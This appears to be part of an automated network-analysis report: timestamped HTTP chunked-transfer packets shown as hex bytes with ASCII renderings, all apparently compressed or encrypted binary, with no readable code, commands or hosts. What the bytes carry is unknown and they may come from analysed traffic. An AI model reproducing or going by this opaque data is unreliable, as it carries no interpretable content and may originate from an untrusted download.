                  2022-10-10 21:21:48 UTC159INData Raw: 32 30 30 30 0d 0a a4 b2 f5 86 87 98 0a cc b5 32 67 05 b7 16 f1 7a 65 dc fa e8 ad 1e bc 01 84 1d e3 5e 24 6e c7 4f a7 53 c4 5f 17 5a d0 05 be 52 20 a6 99 68 4d 76 21 83 d7 39 45 2c 5e 99 eb a8 5c b7 76 3a db 2c d7 0e 79 df a8 90 7e de ce 86 18 12 00 28 78 7b cf c2 3b 29 6d 8e 0a 99 83 bc 98 38 2a 57 e3 f1 5f f7 83 15 37 2a 95 ab d6 cc cd 20 f6 9d 30 c2 9a c7 6d 33 43 05 7b 9f 60 5d ef b8 82 be 50 d3 47 46 0a 37 30 f5 44 ac e7 06 40 8e 09 22 16 c0 46 85 24 63 48 e2 1a fe 06 d8 0e 74 65 88 fe 23 cb 0b 80 83 e4 08 8f 42 40 ea 8e 6a b1 b3 83 c5 75 db 7f f2 22 84 2f 5a 2c ca ae fe fe 11 ec 20 9f 44 b6 94 88 e5 a8 b6 5e f1 da 9f 84 92 60 62 f1 31 54 f0 af 9f 19 83 98 c1 42 71 d2 d2 61 80 69 89 c1 f3 51 9f 7d 23 4c 43 96 b6 c1 ec 80 2d 2d 60 bc 96 1c be c4 ac 17
                  Data Ascii: 20002gze^$nOS_ZR hMv!9E,^\v:,y~(x{;)m8*W_7* 0m3C{`]PGF70D@"F$cHte#B@ju"/Z, D^`b1TBqaiQ}#LC--`
                  2022-10-10 21:21:48 UTC167INData Raw: 18 16 12 b7 c3 e5
                  Data Ascii:
                  2022-10-10 21:21:48 UTC167INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC167INData Raw: 32 30 30 30 0d 0a fe 13 5c 57 34 64 ed de 8c 9a 92 56 3a fc 2c 07 74 5c e1 22 e7 f6 f6 10 87 b3 03 c0 6c 5e 30 56 1f 77 2a 15 43 53 be 4a ca 70 ae 5b 96 a0 80 98 f7 ea 71 8e c7 e0 e5 9b b6 87 bf d4 0c 7c 57 0f 5d 7f ab 94 c4 ba fa 15 59 6c 11 63 39 8e c2 2d 62 59 82 33 29 1c ec 50 55 1c 73 16 60 ae f5 2e 5b 6a 6b ee 48 6e 74 d1 9d 3c d1 22 b6 b3 40 b1 45 d9 c6 2d b4 e2 6e 4d 3c e9 e2 10 89 ce 47 7d f6 46 fe 9e a8 cd 79 11 1a 0d ee c9 eb f8 10 6f 41 0f 75 66 9a fe c8 20 90 35 6e e9 e7 2e b4 77 ef f7 e2 77 73 1d ba 1b 2d f9 ec 00 d7 fb 50 ea 4e 62 48 00 6b 07 2b 8c 48 da 5a f8 9c c1 4b 55 21 9d d5 8b 3a 4b d1 10 20 89 fd 7c 07 08 ca 97 d8 f4 f9 5e ed ce 88 c9 78 8e 27 35 99 50 b1 72 2b bb ff a8 d1 a0 b9 a0 c6 0c 03 9d d2 32 79 e0 6f ba a3 e1 22 46 75 76 62
                  Data Ascii: 2000\W4dV:,t\"l^0Vw*CSJp[q|W]Ylc9-bY3)PUs`.[jkHnt<"@E-nM<G}FyoAuf 5n.wws-PNbHk+HZKU!:K |^x'5Pr+2yo"Fuvb
                  2022-10-10 21:21:48 UTC175INData Raw: 29 f0 4a b9 df 11
                  Data Ascii: )J
                  2022-10-10 21:21:48 UTC175INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC175INData Raw: 32 30 30 30 0d 0a 67 5a 8c 5f 2d af 9b 73 f1 38 58 0e 93 82 80 2d 91 c0 ec 14 47 c4 60 ed c4 1f 85 d9 32 bc 63 99 4a 89 cd 2a 75 6f ce 6a 30 58 28 e6 a5 cd 03 ca e1 2d 81 09 95 77 2e 94 21 6d 49 01 04 82 8a 81 70 44 e7 38 16 2a 4f 5f fd 12 85 69 72 73 01 2d e3 ce 36 11 95 21 94 a5 f8 1a 73 7f 11 a9 96 1b 96 2d 8f 99 9b 52 2d 8b 9c 7b d3 d4 9c e8 c5 b2 e9 58 dd af 73 58 7a 7a 50 63 51 7f 6a 78 59 42 78 d1 cd 88 94 c4 e3 8c cb 85 13 f4 97 aa 4b bf 76 d4 25 4f b5 79 c4 3c a8 1d b6 dc 91 89 ae 53 a1 2a 83 32 bb fd c9 8d d3 0e 9d 93 b8 4c f6 0c 45 73 7b 37 4e 6b 1f 80 e1 07 73 9e 10 de 1a b1 20 f6 de 5e 93 3e be 73 ce 8c 72 01 bd 5d e4 3e e1 da 4a c0 5c 00 b7 8c ab af 56 ef 46 07 2c db 41 3d d0 41 54 17 98 1d be 0e 1d 2e 39 49 96 00 12 26 05 25 f6 fb cf 58 27
                  Data Ascii: 2000gZ_-s8X-G`2cJ*uoj0X(-w.!mIpD8*O_irs-6!s-R-{XsXzzPcQjxYBxKv%Oy<S*2LEs{7Nks ^>sr]>J\VF,A=AT.9I&%X'
                  2022-10-10 21:21:48 UTC183INData Raw: 8a 65 9e ea a1 48
                  Data Ascii: eH
                  2022-10-10 21:21:48 UTC183INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC183INData Raw: 32 30 30 30 0d 0a a0 5f 93 01 eb a1 6b 22 51 c2 c9 69 37 c7 f9 ed 2c 3b 3e ed ab f9 7c ed b5 21 2e fd 7d 76 47 60 a8 57 94 66 13 d2 8e 11 a2 55 5f 0f 40 cb 99 5d 62 00 ba 98 a8 fd 62 eb e7 a9 68 c3 bc fe c2 7f 4d e7 cf 87 83 6f 0b 9b 5f b8 0b 41 47 20 2e 2f 0a 7c 73 78 66 c4 b6 36 f0 24 3c 84 cc 7e 9c 7b 61 f8 98 1e b6 8c b5 85 bc 35 95 32 77 6e 1b 49 91 8c 24 82 87 67 83 2a 64 5e 0f 5d 92 aa 23 8d 04 27 f6 59 8b 54 09 0a 0b 27 7a 78 8e 8e 88 c9 ee 2e 7e d9 6f 93 2c 45 31 bf cb da 28 6b 1e 21 a8 79 22 d8 6d b4 8d 71 df eb 55 4e 53 c2 0f d4 de 75 e7 32 30 98 16 7f fc 70 2a d5 50 58 59 22 f1 b2 03 af 88 1a aa 36 29 d8 7e ec c4 a1 d2 4c c2 9e 4e d6 f0 11 91 2e 8f 0a c2 da b7 64 07 dd 2f 55 71 d4 9f d5 d0 1e 50 35 11 8a 19 2b 70 49 4d f5 93 7c 77 bc c6 af 78
                  Data Ascii: 2000_k"Qi7,;>|!.}vG`WfU_@]bbhMo_AG ./|sxf6$<~{a52wnI$g*d^]#'YT'zx.~o,E1(k!y"mqUNSu20p*PXY"6)~LN.d/UqP5+pIM|wx
                  2022-10-10 21:21:48 UTC191INData Raw: 51 10 c3 95 2a 3a
                  Data Ascii: Q*:
                  2022-10-10 21:21:48 UTC191INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC191INData Raw: 32 30 30 30 0d 0a 9a b0 f8 d5 41 76 36 82 db 8b 18 06 7e 67 26 66 7e e7 39 69 e2 4f 66 16 ad 06 17 bc e3 80 da 3f 40 0f c6 11 97 3b d6 50 ca 79 f1 f1 37 4d 2b 1c 05 fe ab 12 af 1a 2e 52 3c 12 ca 12 17 67 2e 7c 13 8d 06 8d 94 63 af 49 72 3c 8e 21 eb 86 7d 73 8a ae 70 5f 84 be e2 97 72 b4 3a 13 4b 8c 9f cc f5 0a 58 ee 6d d5 d8 c1 be 22 db 6f f2 32 0b b3 77 41 c7 a3 e3 9d 96 21 de 51 9b 25 98 5a 4e b6 31 20 ee 2b 9d 30 c8 8e 55 b2 9b f1 bf 90 2e 49 11 26 b7 7c 18 58 26 d6 1a d5 85 fb 07 10 81 e8 2c 53 b0 51 16 e6 1e 73 a5 a2 1f 04 41 97 40 3d 2e b7 ba e6 81 5d 34 bb e7 2d 66 18 72 24 55 6f 1a 58 b6 3a 01 69 35 29 5b cf ef 2e 25 47 21 49 bc a0 db bd 83 de a9 9f f5 2d ca 77 ef de 14 cd 94 76 e4 bb 77 37 bc a4 9b 25 a1 84 71 f5 df cf f6 54 f8 85 4c 1b 8e e6 31
                  Data Ascii: 2000Av6~g&f~9iOf?@;Py7M+.R<g.|cIr<!}sp_r:KXm"o2wA!Q%ZN1 +0U.I&|X&,SQsA@=.]4-fr$UoX:i5)[.%G!I-wvw7%qTL1
                  2022-10-10 21:21:48 UTC199INData Raw: 21 23 39 90 26 c2
                  Data Ascii: !#9&
                  2022-10-10 21:21:48 UTC199INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC199INData Raw: 31 66 66 38 0d 0a 3e 90 de 6b 17 00 be 08 5a 72 e7 07 fa fe 61 ca a9 9e 76 81 6c 89 80 10 bb 73 78 78 ad c3 62 e0 ea c2 38 88 00 cf da 21 6f 47 ae 7a e6 83 74 02 6f b5 75 27 f8 86 d9 a4 20 e1 72 c8 e1 62 2e 6e f2 79 4b 78 9f c1 f4 6f dc 82 f5 36 9e b8 cd d9 41 18 9e 84 6a e7 e1 04 e4 d7 86 73 b4 78 d0 cc 16 4b 53 84 97 a1 72 69 7f ed 4f 7c a9 de 7f e9 28 59 f9 37 81 eb b6 c4 89 fd 85 79 70 92 77 8b 1c 01 71 47 7f bb 2b c4 66 db da 21 53 ab a9 16 67 ad f2 10 13 d8 b8 a0 dd 64 8c 6c 8c 94 bf fa 51 2e 72 05 3a 0e 49 7f df e1 72 b4 25 50 0e 0d 67 f4 e6 7a e5 42 d9 61 3a 3d 33 ea 32 dd 23 73 51 96 b8 6c 43 e7 f2 61 58 d7 38 63 c0 8e 72 49 23 a2 ff 2e 51 41 ec 9b 90 43 18 14 8b 8c 44 0a e4 b7 c6 a4 c9 3b 82 39 61 74 fa 53 e3 d8 f9 51 ee e7 8a ca 32 cd 55 af 2a
                  Data Ascii: 1ff8>kZravlsxxb8!oGztou' rb.nyKxo6AjsxKSriO|(Y7ypwqG+f!SgdlQ.r:Ir%PgzBa:=32#sQlCaX8crI#.QACD;9atSQ2U*
                  2022-10-10 21:21:48 UTC207INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC207INData Raw: fb ce 1c 1a 99 19 ab f4 d5 63 de cf e1 17 72 24 db 91 b5 3f f7 bd 0b 0f fb 19 33 f8 71 b2 3a 03 b7 7c 63 89 f9 98 eb 46 1e b0 a2 a9 e0 f4 4a 7a 31 df 0f 2d 43 d9 eb 6f c0 73 02 39 43 08 e6 7a 70 31 6e 42 1a 08 60 fe ef f6 d7 7b cd 8a 84 7d b7 5e 3b 51 22 65 10 52 72 d4 31 a0 ef e4 77 b2 d8 75 bf 1c b3 bf 2a 1b 32 f4 44 fa 1d d1 b7 46 87 67 29 56 2b 4c 85 16 d8 a2 2c cc 0f 9b 67 f4 ac 52 32 db 84 40 51 a4 59 64 65 ed 0c 3c 25 5e e6 bc 4a f2 79 e4 36 03 58 bb f8 47 4e b7 08 cb 39 49 93 6a c2 0e 79 98 79 95 81 88 89 12 91 f8 6c ad 63 fb 1d d1 a2 91 6e 68 c6 0a ea be 60 3a 86 30 5f 13 ab 0c 35 0f 4e 46 46 e4 e1 ca 12 4a ea ff dd a8 27 f0 96 67 50 85 ef d6 3f 10 62 41 49 d9 c9 bb fb 6e 0e a7 de 7a 6e f2 b6 2f 83 d0 14 ec 42 08 9c cf 0e 36 0d 75 a0 13 38 af a8
                  Data Ascii: cr$?3q:|cFJz1-Cos9Czp1nB`{}^;Q"eRr1wu*2DFg)V+L,gR2@QYde<%^Jy6XGN9Ijyylcnh`:0_5NFFJ'gP?bAInzn/B6u8
                  2022-10-10 21:21:48 UTC215INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC215INData Raw: 32 30 30 30 0d 0a be 64 5f ba 39 c7 2f 93 6b 44 71 60 97 a3 a1 45 31 68 a0 c5 88 29 d1 12 96 08 04 9a e5 3f 32 e7 a4 f1 b6 0f d9 88 18 59 b1 5a 03 c5 13 d8 9a ae 6a d6 15 63 df 3e 85 4b 94 cf a8 7a d8 58 42 9b 66 07 ad d3 94 45 ab 08 e2 d8 50 82 6f d0 8a 34 f1 02 7d d1 ab 68 7e 10 1a b5 8c b2 f9 3f b1 54 07 2a 3e c1 1c 3d 3f 8f c6 2b 6e 8b 2f 8e f7 e7 4f be 73 a6 3f 29 64 6f 11 27 99 55 e6 1c d5 02 6b 5e 82 1a 91 37 b3 0a a1 19 27 ea 67 a9 0d 63 d3 83 85 3e 42 22 de 57 d3 e2 59 60 fb 4d 99 08 32 7d 2e 2d d2 a1 4e ee 72 a7 f5 66 85 9c 51 3e 27 0a 42 ef 9b c9 c9 c6 ce 35 f1 ed 22 06 b3 01 42 78 62 5e 48 18 40 70 84 af ca 3b 02 0a 6f e6 be b2 79 b7 f5 0c 70 69 9e bd 0a e4 5f fd 65 6e e0 9d 7d b0 a9 a7 a3 84 34 ae fc 6f 27 a9 b4 9d 8c 70 d5 9f d8 4d e1 38 05
                  Data Ascii: 2000d_9/kDq`E1h)?2YZjc>KzXBfEPo4}h~?T*>=?+n/Os?)do'Uk^7'gc>B"WY`M2}.-NrfQ>'B5"Bxb^H@p;oypi_en}4o'pM8
                  2022-10-10 21:21:48 UTC223INData Raw: c4 48 e8 b8 89 a0
                  Data Ascii: H
                  2022-10-10 21:21:48 UTC223INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC223INData Raw: 32 30 30 30 0d 0a 64 11 e5 b2 f0 e0 fe 3d b6 68 27 72 b3 45 72 f9 3d 9e 73 06 2b bc af 42 e6 a7 c2 c7 48 58 01 f1 1f 23 18 8e 2b 48 17 b0 ff fc 6e 56 34 34 ef f9 b4 7b 3c 33 97 f9 14 37 d1 53 aa 9f a0 9f 09 fc 29 26 d2 54 7a e4 4f 62 23 ec 3b 81 e1 f9 87 2e 5c d0 4d 2b 0a be 6b ad 5a 8a 08 ee 6e d0 d6 79 80 b5 e0 01 d6 98 b9 d7 d1 e8 fc b7 a2 3c 31 a9 f5 26 3a c3 c4 f8 87 cf d7 34 cc 08 cb 93 c9 74 8e 6e 0b 02 8f 7d e6 89 97 8b c8 57 83 cc 23 e0 53 f8 a0 c7 c2 e5 a1 dc d1 0f 51 36 ce 9f 42 eb 6c 4d 34 cc dc 43 3f e7 4f c9 6a e3 e6 3e 32 71 a3 18 36 29 8a cf 3b a3 f3 99 d2 87 bb df d0 1e 4d 96 af f8 5b a1 32 c2 00 25 0d d0 59 b5 d8 fa 72 a3 66 ad 6d f4 e2 ab 40 67 e5 ee aa b4 65 c0 ea ed c0 a2 7e 53 6c 52 1c 1d 4a 01 fd f6 d5 24 3c 99 e5 90 79 ae f0 9b bf
                  Data Ascii: 2000d=h'rEr=s+BHX#+HnV44{<37S)&TzOb#;.\M+kZny<1&:4tn}W#SQ6BlM4C?Oj>2q6);M[2%Yrfm@ge~SlRJ$<y
                  2022-10-10 21:21:48 UTC231INData Raw: d0 60 4e ed 2f 0f
                  Data Ascii: `N/
                  2022-10-10 21:21:48 UTC231INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC231INData Raw: 32 30 30 30 0d 0a c9 f0 ef f4 bf cf ad 70 b3 1a 84 ff 97 38 52 22 c6 6a fe fd f5 da a9 fc 19 50 75 43 2b 42 ad 52 55 cd 3d ad 21 9e 5d af 08 a6 3a f1 5c 9d cf f1 71 5e 1c fe 62 d2 b6 fd 85 f5 90 95 d0 b0 93 9a 69 6b 2d f0 ee 5e 0f b4 69 92 d9 18 5e 74 ae a8 f4 66 80 6d 35 ee 76 1f 7f ae 86 28 71 e4 9e a4 e8 44 ca 16 20 70 65 55 00 22 7e 20 19 e8 06 3f 6f 5c 72 89 cb d6 5a 71 27 2d fd b1 df fb c2 b5 af 4c 18 1b 08 fc 79 7b a3 27 81 b6 e6 19 bd 28 26 f6 eb c3 ef 03 40 31 ae a6 02 f3 3f b8 92 63 a2 1e 8d 4a 32 ed d4 99 45 81 51 40 b5 23 78 99 06 cd 04 b3 64 76 df 52 5a 30 27 15 41 41 b1 7e a9 a4 b9 60 c9 55 b0 1a 9e 88 ba e5 60 12 0e 1e 7b a6 35 60 1b 61 a5 06 55 fb 96 8b 50 43 01 5d 8c 6a 84 6e 76 e5 74 1f 30 fa cd 84 01 44 14 7e 26 11 df 03 c0 37 89 a1 58
                  Data Ascii: 2000p8R"jPuC+BRU=!]:\q^bik-^i^tfm5v(qD peU"~ ?o\rZq'-Ly{'(&@1?cJ2EQ@#xdvRZ0'AA~`U`{5`aUPC]jnvt0D~&7X
                  2022-10-10 21:21:48 UTC239INData Raw: 0e 17 73 c1 f7 3f
                  Data Ascii: s?
                  2022-10-10 21:21:48 UTC239INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC239INData Raw: 32 30 30 30 0d 0a 5a 5e f9 c9 1e a0 c3 51 95 13 a6 0d 46 8b 90 67 6f 08 53 e3 6b 1b cf b8 00 cd d3 01 f8 7b 5f e5 90 14 13 0d 47 2a 8e 17 31 f2 85 24 bf 90 b1 fa 79 32 f7 85 d4 cd 66 8f 82 63 db f2 30 31 7b d9 01 1c 29 32 63 34 65 2c b8 4e 86 ed 43 61 30 ad e6 b3 72 01 f1 e7 c1 dd 72 ce ab 93 d3 5a 0c 2e db 9a a1 9e 87 dc fd 43 37 64 22 8e 7a d3 2d e7 85 76 04 70 22 16 88 d6 f4 97 fd 04 a4 35 53 e0 89 c2 08 6e 87 3d 8f 45 a3 c9 37 57 d8 15 30 3b 8f a7 20 a8 3b 74 cf 34 0c 86 d4 cf 6a 6c 07 21 77 ed c0 fb be d7 45 4a 5a ab 60 a9 84 32 4b 20 b2 b1 93 d7 50 08 a0 d0 56 78 76 91 10 c4 db 72 03 0a 43 92 a1 c1 2b ad d8 2a b2 7b bc 05 bb 3b ba e0 c7 ae 4b 0b f4 53 12 2d 45 62 b6 6f 00 3c 00 e3 b3 93 7b c6 7c 3f f6 e8 6d 98 bb bc 47 5d 16 dc 51 b0 74 8e 3d c1 47
                  Data Ascii: 2000Z^QFgoSk{_G*1$y2fc01{)2c4e,NCa0rrZ.C7d"z-vp"5Sn=E7W0; ;t4jl!wEJZ`2K PVxvrC+*{;KS-Ebo<{|?mG]Qt=G
                  2022-10-10 21:21:48 UTC247INData Raw: 5b 73 ef 4d c4 30
                  Data Ascii: [sM0
                  2022-10-10 21:21:48 UTC247INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC247INData Raw: 32 30 30 30 0d 0a e2 94 20 bd 2e 2f f5 d9 a2 df 5a d8 3e 7e 5d 7e 2e 6e 7c b4 2a 65 8d 2e 00 45 b3 68 d6 ff 3a a1 79 c9 e6 0f e6 1f 72 7e 9f 14 51 98 7d aa 5f 55 92 21 93 02 79 45 e8 b2 f0 39 f9 ec 68 8d a6 a7 94 fa ae c1 ba 3c d6 cc 97 a1 17 3f 94 b2 65 f5 93 c4 5c 80 1e 7d 3e 10 51 b9 b4 98 fc b6 85 4f e6 0f 40 38 4b da 56 f0 a8 f3 9f 74 a7 9b 7f a2 97 08 fd 3b 2e da eb bb 86 da 92 1d b6 c3 cc 7d 7a db 09 d7 5f 4f 22 9c ac 83 05 45 a7 8c ad f2 6a 0d ae 14 c0 2e 9a 16 b2 36 df 38 75 f2 b5 af bf 81 26 36 12 80 59 6d fe 32 9d dc 79 7b 84 ba fb 8d 2c 49 86 a4 d8 cf 98 df 5e 9c 4c f6 23 e9 49 3f 95 e7 63 53 0d e2 fc fe 49 88 8c 29 82 22 66 f8 ce 19 9f 1c 95 75 2a 88 96 8c 94 0d 84 8f 2c e9 32 e2 9b 7c b6 6b de 67 e2 e2 d8 74 22 ed c9 5d 4e d4 40 b3 6a 40 29
                  Data Ascii: 2000 ./Z>~]~.n|*e.Eh:yr~Q}_U!yE9h<?e\}>QO@8KVt;.}z_O"Ej.68u&6Ym2y{,I^L#I?cSI)"fu*,2|kgt"]N@j@)
                  2022-10-10 21:21:48 UTC255INData Raw: 48 1c 85 39 a3 c1
                  Data Ascii: H9
                  2022-10-10 21:21:48 UTC255INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC255INData Raw: 32 30 30 30 0d 0a d3 49 1d 30 cc 13 9a bd 45 69 ce 09 a3 39 f0 bc 81 4e 62 15 b5 75 85 43 dd 60 67 09 3d 72 e5 3a 8e 5e 46 34 2b 55 c3 8c 6f d2 b5 de e3 2b 98 3e 8c 00 92 30 dd c8 dc f8 80 59 f0 34 a4 59 ce 79 31 27 d0 87 5c 20 fa f9 97 cf 6c 04 9f e3 23 20 16 58 0a bf f3 77 84 e9 4c 94 a9 a3 0a bd e2 d5 f9 8a a3 db 93 64 12 86 fa f8 87 b8 d2 d9 e3 5b 5f a3 9e 6f a8 41 f5 48 ec de bc 23 fd a9 ee 93 ba 46 12 2f 10 1b 75 7c 10 54 ff ea 08 a7 55 69 0e 5a e0 4b 9b 74 f6 50 43 c1 74 15 d6 3a aa ee dc e2 35 87 c7 5b 0a 67 9f 9a 15 4c b3 af d2 31 87 05 9b 33 02 41 52 a5 34 22 e9 01 86 1b 27 e9 06 a5 0d 2f 6d af ab 95 3d 33 bc 57 d7 79 da d9 c5 da 1a ad 39 27 68 71 a3 d4 42 ea 1b a3 ce 1a fa 21 e8 69 5c 42 06 aa 55 02 d5 0a 04 93 71 e7 71 8d 36 50 42 53 0f bf 6c
                  Data Ascii: 2000I0Ei9NbuC`g=r:^F4+Uo+>0Y4Yy1'\ l# XwLd[_oAH#F/u|TUiZKtPCt:5[gL13AR4"'/m=3Wy9'hqB!i\BUqq6PBSl
                  2022-10-10 21:21:48 UTC263INData Raw: fa 86 8f c8 90 78
                  Data Ascii: x
                  2022-10-10 21:21:48 UTC263INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC263INData Raw: 31 66 66 38 0d 0a c4 2c 3b b2 0c bb ff c4 ec d6 ea 4a 74 f3 d3 c2 95 fa a3 08 ce f7 7b f4 dd 76 1e 55 b9 4d a1 69 10 e4 57 d6 e7 39 16 ed 1b c1 e0 25 90 7d 3d 24 f3 61 b3 67 d0 dd 93 b4 bd 02 db 80 77 a4 d2 34 75 24 23 b6 bc 07 5f e0 17 89 13 9d c8 ef a5 0a 8a 0b 05 ee 7d cc f6 73 0c 10 82 bc e0 66 cf ec 3d 40 0f 81 17 06 eb e0 48 f2 48 76 30 cd d4 24 b9 7d 8c e3 fb c6 0c 74 b7 6f e9 0e 29 14 5d 3b 37 67 99 6a b0 79 ba 33 2a cf 89 b1 59 51 d1 4c 15 40 01 a1 c5 cf 94 9d 7e 8b 84 6f 3f ab 07 b5 30 31 af 82 e0 bd 36 12 d8 ae 96 59 9e 62 cd d7 dc a0 62 f4 56 1a 2b ff cd 59 76 d6 c0 22 69 bb b4 d6 03 de 3b 75 7c 4b 04 6d 89 3c d8 11 96 46 c9 40 0c 3e 5f 1f 71 17 ac ed 2c 9c 8e 5f 94 c4 de b4 2b b2 76 2f c8 a5 80 08 f5 e6 e6 13 81 64 f2 42 16 bc 65 db 25 2f ec
                  Data Ascii: 1ff8,;Jt{vUMiW9%}=$agw4u$#_}sf=@HHv0$}to)];7gjy3*YQL@~o?016YbbV+Yv"i;u|Km<F@>_q,_+v/dBe%/
                  2022-10-10 21:21:48 UTC271INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC271INData Raw: ab ac 58 61 3e 8c ff 84 70 b5 5d d4 9d 11 be a0 1b 79 fd 47 c8 a9 c9 97 12 51 72 74 8f d5 05 59 ca e7 7e 45 b2 bc 59 f0 db 2c c9 51 c4 99 19 2a c9 d9 be 33 b6 07 bc 88 17 e2 96 a6 5a e3 b9 7a 3b 34 da c9 38 68 a1 db 33 87 15 da 66 cb e6 0f 76 03 d3 3a 1e 0a 86 d9 09 49 5a 6c 33 ca 8c 53 c1 a6 05 fc 6e df 4e f3 86 12 63 b6 c1 6c 1b 94 28 e8 29 b8 cb f0 5b fd 3f a9 f0 bf 18 85 92 50 f7 4d 9a 6a eb 28 db af 10 44 51 ab 7c 21 dd 9e cc a8 3f 38 2c d6 5e 32 74 07 d8 17 06 a3 56 98 b1 b6 df 4a 27 63 df c3 fe 76 20 11 1f 0e 9a 3b c3 7d 85 70 b0 bc 78 49 89 5b 19 18 46 dc fe 40 08 17 d4 17 f1 69 12 57 06 03 07 20 74 ea 32 03 c3 05 33 00 a7 ec 23 48 21 50 0c c4 b6 b4 39 3c f7 29 22 33 34 18 77 5e a1 58 dc 3d 75 4c bf 9f 9a 13 86 1f b5 24 f7 36 da 37 64 9e 64 20 4a
                  Data Ascii: Xa>p]yGQrtY~EY,Q*3Zz;48h3fv:IZl3SnNcl()[?PMj(DQ|!?8,^2tVJ'cv ;}pxI[F@iW t23#H!P9<)"34w^X=uL$67dd J
                  2022-10-10 21:21:48 UTC279INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC279INData Raw: 32 30 30 30 0d 0a 21 37 5f 80 e3 83 8a bd 73 eb d0 28 d1 20 02 8b a4 c3 c3 9f de f2 9b 15 b6 95 b0 8f 24 ad 0f b9 6f a8 28 d4 4a 84 05 76 a9 ef 85 b1 fb f3 9a 5e 74 7a 09 5c 44 15 de 63 1a 26 69 ac 1c cf d2 06 3a 8c 5b ac 85 84 c6 34 07 fe 91 76 8c c4 dd 46 f8 96 95 0b 6a 26 d2 03 4b c7 93 9d b9 b1 b3 dd 1f f2 51 03 28 10 a5 c7 09 cd 72 6f 46 25 61 a4 34 dd 0f 8d 24 50 1a 8a 05 58 b9 6f 55 ae c6 3d c1 2d bd 97 38 7b 36 f1 75 7f ba c8 80 6d d2 14 da bd e4 d9 5a e1 58 ca a9 f9 a7 c1 ec 29 61 60 87 e0 bd f1 60 e4 ad 2b 24 c4 ad 25 d1 2f 04 9b 0e ec 82 39 e0 f9 77 06 0f a4 96 2e aa fe 2e d7 94 bd 89 30 a9 ee 26 56 1d 32 77 25 27 b8 d7 55 55 88 26 94 09 b8 65 33 29 80 9c 6a 41 c9 ae 38 0c 0f 1e 85 f0 e8 16 a3 16 5d 29 50 7c 1d 8c 32 99 67 d8 2e 8a 36 6b 02 94
                  Data Ascii: 2000!7_s( $o(Jv^tz\Dc&i:[4vFj&KQ(roF%a4$PXoU=-8{6umZX)a``+$%/9w..0&V2w%'UU&e3)jA8])P|2g.6k
                  2022-10-10 21:21:48 UTC287INData Raw: c9 6b 1c 79 8b d5
                  Data Ascii: ky
                  2022-10-10 21:21:48 UTC287INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC287INData Raw: 32 30 30 30 0d 0a bb f6 8a 68 6f 6c f3 00 fd a9 bf 27 43 44 3c 33 ed b7 7a 15 0c 4b c7 c8 1a 1f c8 b2 0e de dd 87 d9 15 31 a3 1d 84 4b b3 cf a7 4a 61 03 d6 37 34 2b 3b c0 7d 06 63 30 16 1a 5a ed 6c 4d df 48 f5 b8 99 54 f7 50 2b 2a 21 37 54 8c 6c a2 66 cd 9b 59 ca 8c 17 e3 36 fd 9a 1e 80 0e fb 1f 4e 30 d1 7b 74 a2 f4 c6 14 07 7c 1f 61 e8 f9 61 6e cd 91 71 79 7a 5e d4 bb 56 7d 13 92 c9 01 e0 a4 72 2d c5 65 96 04 d9 46 71 64 ca a4 fb c3 38 95 f0 f3 8c 0c eb 3d c1 eb 3d f1 9d 94 3a 08 1c 62 4a 7e 35 25 a4 bb e6 d1 9b ea c2 b1 08 46 73 99 4c fc 1c a3 30 9a b4 72 41 d2 5f ba f1 9c 7e 85 48 c2 68 d2 ba 27 b2 d7 99 ee e4 5b eb 71 b6 56 af 80 b3 d4 de 45 82 ac 52 c5 c4 6f 56 03 06 5a 8d 33 21 a0 41 71 bd 15 dc 6e 5c a6 83 6f 89 fd 35 2e c5 64 c4 d9 5b cb 18 58 1e
                  Data Ascii: 2000hol'CD<3zK1KJa74+;}c0ZlMHTP+*!7TlfY6N0{t|aanqyz^V}r-eFqd8==:bJ~5%FsL0rA_~Hh'[qVERoVZ3!Aqn\o5.d[X
                  2022-10-10 21:21:48 UTC295INData Raw: ba f3 fd a4 4e 76
                  Data Ascii: Nv
                  2022-10-10 21:21:48 UTC295INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC295INData Raw: 32 30 30 30 0d 0a 3b c9 70 6d a9 2c 07 b3 bd 8e 26 a8 ba 2f 06 5c 6a 90 eb 92 71 fe 66 41 55 e9 d4 e7 03 ff 10 11 a1 a2 d2 ab 66 fa c7 34 01 91 0b 29 9f 5e c6 95 6c 3b 57 3d d2 4d ee c9 c8 9d 79 28 48 31 36 68 7d 57 f4 d6 f5 9f 41 e2 4f 0b 9a 51 c7 91 22 14 75 d5 c3 d9 7e 28 04 64 27 9d 5d 81 c2 19 43 91 11 59 94 7f 62 51 9d c0 97 ea 46 a9 ba 32 d1 42 cf 76 41 25 86 8d 5e 7f 0a 18 f5 4d 7f 64 b1 e0 16 91 ca a9 fc cd 23 f4 d6 5a 76 b2 35 c4 92 6c 87 71 24 6c ea 68 36 07 22 66 93 2b 11 6f a5 5e 19 b4 98 f1 de 3b cb 3d 0f 26 b2 bc bd 52 7b 86 cd 25 f0 fd bf 41 a9 38 24 da 3c 22 ee de 8f 96 45 28 4e 27 77 fd b0 cb 36 88 02 67 c5 a6 6f 13 fa c1 e7 b1 13 92 4d a6 1a de fc ca 70 d5 c2 8c 69 ab 86 93 67 b4 e2 b6 9f 35 8f 67 58 b2 8c 19 4c 54 d4 b1 34 8a 64 82 7e
